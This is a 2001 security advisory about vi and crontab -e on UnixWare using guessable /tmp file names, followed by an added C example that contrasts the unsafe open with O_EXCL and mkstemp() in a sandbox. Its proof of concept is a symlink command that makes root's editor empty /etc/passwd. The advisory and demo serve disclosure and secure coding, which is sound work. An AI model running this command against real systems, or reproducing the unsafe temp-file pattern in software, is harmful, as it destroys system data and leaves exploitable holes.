[SRT2001-09] - vi and crontab -e /tmp issues

From: Richard Johnson (thiefat_private)
Date: Tue May 22 2001 - 11:15:16 PDT

    ======================================================================
    Strategic Reconnaissance Team Security Advisory (SRT2001-9)
    Topic: vi and crontab -e /tmp issues
    Vendor: Santa Cruz Operations
    Release Date: 05/07/01
    ======================================================================
    .: Description
    vi makes poor use of /tmp. File names are very predictable.
    
    .: Impact
    As a user, run ln -s /etc/passwd /tmp/Ex04161 and wait for root to
    run vi. When he does, voilà: he will clobber /etc/passwd with a
    null file.
    
    .: Workaround
    Don't use vi or crontab -e.
    
    .: Systems Affected
    Unixware 5.x
    
    .: Proof of Concept
    ln -s /etc/passwd /tmp/Ex04161
    
    .: Vendor Status
    A copy of this advisory was mailed to their attention.
    
    .: Credit
    Kevin Finisterre
    dotslashat_private
    
    ======================================================================
    ©Copyright 2001 Secure Network Operations , Inc.  All Rights Reserved.
    Strategic Reconnaissance Team | reconat_private
    http://recon.snosoft.com      | http://www.snosoft.com
    ----------------------------------------------------------------------
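
Added example, not part of the original advisory and not vi's code: the predictable-name open that follows a planted symlink, next to two hardened ways of creating the scratch file. The open flags attributed to the flawed editor are an assumption (the advisory shows none), all function names are hypothetical, and the "victim" is a constructed 7-byte file in a private sandbox directory rather than /etc/passwd.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed model of the flaw: a fixed, guessable name opened with O_CREAT|O_TRUNC.
   open() follows a pre-planted symlink and truncates whatever it points to. */
int open_scratch_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* O_EXCL with O_CREAT fails (EEXIST) if the name exists, even as a symlink. */
int open_scratch_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: mkstemp() picks an unpredictable name, creates it exclusively, mode 0600. */
int open_scratch_mkstemp(const char *dir, char *name, size_t n) {
    snprintf(name, n, "%s/ExXXXXXX", dir);
    return mkstemp(name);
}

/* Constructed sandbox: a private directory holds a 7-byte stand-in "victim" file and
   a symlink to it under the predictable name. Returns the victim's size after the open.
   mode: 0 = unsafe, 1 = O_EXCL, 2 = mkstemp. Returns -1 on setup failure. */
long victim_size_after(int mode) {
    char dir[] = "/tmp/srtdemoXXXXXX", victim[64], planted[64], name[64] = "";
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/Ex04161", dir);
    FILE *f = fopen(victim, "w");
    if (!f || fputs("sample\n", f) < 0 || fclose(f) != 0) return -1;
    if (symlink(victim, planted) != 0) return -1;
    int fd = mode == 0 ? open_scratch_unsafe(planted)
           : mode == 1 ? open_scratch_excl(planted)
                       : open_scratch_mkstemp(dir, name, sizeof name);
    if (fd >= 0) close(fd);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    if (name[0]) unlink(name);
    unlink(planted); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("unsafe=%ld excl=%ld mkstemp=%ld\n",
           victim_size_after(0), victim_size_after(1), victim_size_after(2));
    return 0;
}
```

Only the unsafe open leaves the stand-in file empty; with O_EXCL the open is refused, and with mkstemp() the planted name is never used.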
    


